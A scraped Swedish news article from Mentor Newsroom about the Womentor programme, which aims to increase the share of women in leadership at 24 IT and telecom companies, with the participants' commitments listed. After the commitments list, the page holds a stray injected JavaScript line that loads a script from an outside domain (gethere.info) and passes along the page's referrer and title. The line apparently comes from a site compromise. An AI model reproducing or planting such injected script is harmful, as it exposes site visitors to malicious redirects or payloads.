De ska lösa IT-kompetensen - Mentor Newsroom
finns!
Mentor Communications Group logotype
30 maj 2017
Mentor Newsroom lototype
23 redaktioner – Sveriges mest initierade näringslivsbevakning.
Verkstäderna - Tillverkande industri
2017-02-01 | 07:15
Verkstäderna logotype

De ska lösa IT-kompetensen

Kompetensbristen i IT- och telekombranschen är skriande och kräver åtgärder. Få kvinnor i branschen är en av de utmaningar svenska IT- och telekomföretag har att hantera.

Nu i veckan inledde 24 företag årets engagemang i den elfte upplagan av mentor- och förändringsprogrammet Womentor, som hjälper företag att systematiskt arbeta för att öka andelen kvinnor på ledande positioner. Ytterst handlar det om att öka hela branschens förmåga att attrahera och behålla de bästa talangerna, män såväl som kvinnor.

När Womentor, som drivs av IT&Telekomföretagen inom Almega, startade 2006 var andelen kvinnor totalt i branschen 32 procent och andelen kvinnliga chefer 25 procent. Tio år senare hade andelen kvinnor som är chefer ökat till cirka 28 procent, medan andelen kvinnor i branschen totalt faktiskt minskat till cirka 29 procent. I en bransch där kompetensbristen är en av de allra största utmaningarna är det faktum att kvinnor är underrepresenterade ett allvarligt problem som kräver åtgärder.

Trots att förändringen sett till hela branschen går långsamt, visar utvärderingarna av de tio omgångar av Womentor som hittills genomförts att den går att åstadkomma. Det är tydligt att de företag som lyckas är de vars högsta ledning tar frågan på allvar.

– Det som skiljer Womentor från andra program är att det inte riktar sig enbart till enskilda individer utan innebär att hela företaget skriver under på att vara aktiva i ett förändringsarbete. Att sätta mål och genomföra aktiviteter som leder till att målen nås ger resultat. Engagemanget och den systematiska uppföljningen från företagsledningen är nyckeln till framgång, säger Anne-Marie Fransson förbundsdirektör på IT&Telekomföretagen.

– Att vi i år har hela fem VDar som mentorer i programmet, och mycket seniora adepter, är hoppingivande eftersom det visar både på att det finns engagemang för frågan på högsta ledningsnivå och att det är möjligt för kvinnor att göra karriär i branschen, menar Anne-Marie Fransson.

Företag som deltar i Womentor 2017

Agero, Capgemini, CGI, Comhem, CSC, Dustin, Evry, Fujitsu, HPE, IBM, IFS, Infocare, IP-Only, Microsoft, Nets, PA Consulting, Sogeti, Tele2, Telenor, Teleopti, Telia Company, Teracom, Tieto och 3 (Hi3G Access AB).

Engagemanget innebär att företagen:

– Tar aktivt ställning för och engagerar sig i att genomgå ett förändringsarbete, och att inspirera andra i branschen att göra detsamma.

– Sätter upp mätbara mål för att uppnå en ökad andel kvinnliga ledare i det egna företaget. Målen ska fokusera på kvinnor som kompetens och resurs i arbetet med ledningsförsörjning och följas upp och redovisas årligen.

– Bjuder in VD, HR- och Kommunikationschefer och andra nyckelpersoner att medverka vid introduktionsdagar och workshops som syftar till att lyfta och dela metoder och verktyg för ökad jämställdhet och mångfald.

Utser en person från företagsledningen till ”Diversity Manager”, med uppdrag att delta i workshops och för företaget utforma långsiktiga och kortsiktiga mål, mät- och uppföljningsmetoder, och strategier för rekrytering, utbildning och utveckling kopplade till mångfald.

– Kommunicerar aktivt, både till sina egna medarbetare och till omvärlden, sin medverkan i Womentor och vikten av jämställdhets- och mångfaldsfokus.

– Utser (en eller flera) kvinnliga medarbetare i ledarposition med potential att fortsätta utvecklas som chef som adept till mentorprogrammet.

– Erbjuder mentorkandidater till programmet.

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

ANNONS:
ANNONS:
ANNONS:

MENTOR NYHETSBREV

Vill du ha Mentornewsroom nyhetsbrev - fyll i din e-postadress nedan
Huvudkontoret: Tryffelslingan 10,181 72 Lidingö Box 72001, Tel 08-670 41 00. Hitta hit!

© MENTOR COMMUNICATIONS AB 2013